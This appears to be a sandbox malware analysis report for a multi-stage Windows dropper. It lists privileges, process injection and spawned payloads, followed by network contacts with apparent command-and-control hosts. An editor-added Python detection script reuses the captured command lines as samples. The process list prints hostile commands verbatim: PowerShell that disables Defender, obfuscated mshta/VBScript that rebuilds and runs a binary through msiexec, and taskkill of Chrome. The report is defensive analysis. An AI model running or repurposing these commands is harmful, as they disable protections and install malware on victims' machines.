Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14d32a38896785b13.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2408 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe
PID 2408 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe
PID 2408 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe
PID 2408 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe
PID 2408 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe
PID 2408 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe
PID 2408 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe
PID 2204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2872 wrote to memory of 2528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2956 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2204 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 272

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\is-0VANL.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-0VANL.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$6022A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY

C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$30204,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Sat142b09ae40c44cf.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 464

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe
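The mshta, cmd, msiexec and taskkill lines above are the loader's fragment-reassembly stage: `echo | set /p = "MZ"` writes the two DOS-header bytes without a newline, `copy /y /b` glues them onto header-less fragments (so no fragment on disk looks like a PE), `echo %TIME%` into the final fragment gives a fresh hash on every run, and `msiexec -y <file>` calls the rebuilt file's DllRegisterServer export rather than installing anything. Letter case and file names are randomised, so string-exact matching fails. The following detection logic is an added example written for this page, not part of the sandbox output; it runs the report's own command lines (copied from the process list above, plus two constructed benign lines) through case-insensitive rules whose names are the editor's own.

```python
"""Detection logic for the mshta -> cmd -> msiexec loader chain recorded above.

Added example by the editor; not part of the sandbox output. SAMPLE_EVENTS are
the command lines from this report's process list, BENIGN_EVENTS are constructed.
"""
import re


def normalize(cmdline: str) -> str:
    # The loader randomises letter case; collapse whitespace and lower-case first.
    return re.sub(r"\s+", " ", cmdline.lower()).strip()


RULES = {
    # mshta.exe handed an inline vbscript: URI that spawns cmd via WScript.Shell
    "mshta_inline_vbscript": re.compile(r"mshta\.exe.*vbscript:.*wscript\.shell"),
    # set /p = "MZ" (no newline) followed by copy /b of 2+ fragments: PE rebuilt
    # on disk. Quotes are doubled when nested inside the VBScript, hence "+.
    "pe_rebuilt_from_fragments": re.compile(
        r'set\s*/p\s*=\s*"+mz"+.*copy\s+/y\s+/b(\s+\S+\s+\+){2,}'),
    # %TIME% echoed into a trailer file that is appended last: per-run hash busting
    "hash_busting_trailer": re.compile(r"echo\s+\S*%time%\S*\s*>\s*\S+"),
    # type <src> > <dst> && start <dst>: copy-and-run of a dropped binary via cmd
    "type_copy_and_start": re.compile(r"\btype\s+.*>\s*\S+\s*&&\s*start\s+"),
    # killing the browser so its locked credential databases can be read
    "kills_chrome": re.compile(r'taskkill\b.*[-/]im\s+"?chrome\.exe'),
}

# msiexec /y <file> invokes the file's DllRegisterServer; a non-.msi argument
# therefore means "load this DLL", not "install this package".
MSIEXEC_Y = re.compile(r'msiexec(?:\.exe)?"? [-/]y (\S+)')


def classify(cmdline: str) -> list[str]:
    """Return the names of every rule the command line triggers."""
    text = normalize(cmdline)
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    m = MSIEXEC_Y.search(text)
    if m and not m.group(1).endswith(".msi"):
        hits.append("msiexec_dllregisterserver_nonmsi")
    return hits


CHAIN = {"mshta_inline_vbscript", "pe_rebuilt_from_fragments",
         "msiexec_dllregisterserver_nonmsi"}


def chain_detected(cmdlines) -> bool:
    """True when all three stages of the reassembly chain appear in one process tree."""
    seen = set()
    for c in cmdlines:
        seen.update(classify(c))
    return CHAIN <= seen


SAMPLE_EVENTS = [
    r'"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )',
    r'"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f',
    r'"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )',
    r'"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7',
    r'msiexec -y .\2KSA.GF7',
    r'taskkill /f /im chrome.exe',
]

# Constructed benign lines: a real MSI install and an unrelated taskkill.
BENIGN_EVENTS = [
    r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\7z2301-x64.msi" /qn',
    r'taskkill /f /im notepad.exe',
]

if __name__ == "__main__":
    for cmd in SAMPLE_EVENTS + BENIGN_EVENTS:
        print(classify(cmd) or "-", "<=", normalize(cmd)[:60])
    print("chain detected:", chain_detected(SAMPLE_EVENTS))
```

The rules key on structure (header-less fragment concatenation, `-y` with a non-.msi argument, a `vbscript:` URI on an mshta command line) rather than on the randomised file names, which is what survives re-packing between campaigns.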

Network

Country Destination Domain Proto
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:49276 tcp
N/A 127.0.0.1:49278 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 ppgggb.com udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.microsoft.com udp
NO 96.6.17.223:80 www.microsoft.com tcp
NL 194.104.136.5:46013 tcp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 72.247.176.59:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
